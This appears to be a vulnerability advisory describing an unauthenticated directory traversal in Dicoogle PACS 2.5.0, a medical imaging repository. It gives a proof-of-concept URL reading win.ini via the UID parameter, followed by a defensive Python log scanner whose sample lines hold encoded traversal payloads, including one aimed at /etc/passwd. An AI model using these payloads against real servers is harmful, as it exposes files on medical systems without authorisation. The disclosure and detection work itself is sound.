# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal
# Date: 2018-05-25
# Software Link: http://www.dicoogle.com/home
# Version: Dicoogle PACS 2.5.0-20171229_1522
# Category: webapps
# Tested on: Windows 2012 R2
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt

# 1. Description
# Dicoogle is an open source medical imaging repository with an extensible
# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
# to local file inclusion. This allows an attacker to read arbitrary files that the
# web user has access to. Admin credentials aren't required. The 'UID' parameter
# via GET is vulnerable.

# 2. Proof of Concept
http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
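The check a defender would want for the `UID` parameter described above, as an added example that is not part of the advisory or of Dicoogle's own code: it treats a safe UID as exactly one path component (no `..`, no `\` or `/` separators, no absolute path, even after double URL-encoding), and runs that rule over constructed web-server log lines to flag traversal attempts against `/exportFile`. The log lines, client addresses and UID values are constructed for the example.

```python
"""Flag traversal attempts against Dicoogle's /exportFile?UID= endpoint.

Added example (not Dicoogle's code). uid_escapes_root() is the allow-list
rule a server-side fix would apply; flag_traversal_requests() applies it
to access-log lines for detection.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines in combined access-log format.
SAMPLE_LOG = """\
10.0.0.5 - - [25/May/2018:10:01:02 +0000] "GET /exportFile?UID=1.2.840.113619.2.55.3 HTTP/1.1" 200 5120
10.0.0.9 - - [25/May/2018:10:01:07 +0000] "GET /exportFile?UID=..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 200 403
10.0.0.9 - - [25/May/2018:10:01:09 +0000] "GET /exportFile?UID=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1200
10.0.0.7 - - [25/May/2018:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')


def uid_escapes_root(uid: str) -> bool:
    """True if the UID would name anything other than one file directly under the export root.

    Backslashes count as separators because the Windows target treats them as
    such; decoding is repeated (bounded) so double encoding cannot hide '..'.
    """
    decoded = uid
    for _ in range(3):  # each pass strips one layer of percent-encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    parts = [p for p in decoded.replace("\\", "/").split("/") if p not in ("", ".")]
    # A legitimate DICOM UID is a single non-empty component that is not '..'.
    return len(parts) != 1 or parts[0] == ".."


def flag_traversal_requests(log_text: str) -> list:
    """Return the client IPs of requests whose exportFile UID escapes the root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("path"))
        if url.path != "/exportFile":
            continue
        for uid in parse_qs(url.query).get("UID", []):  # parse_qs decodes one layer
            if uid_escapes_root(uid):
                hits.append(line.split()[0])
    return hits
```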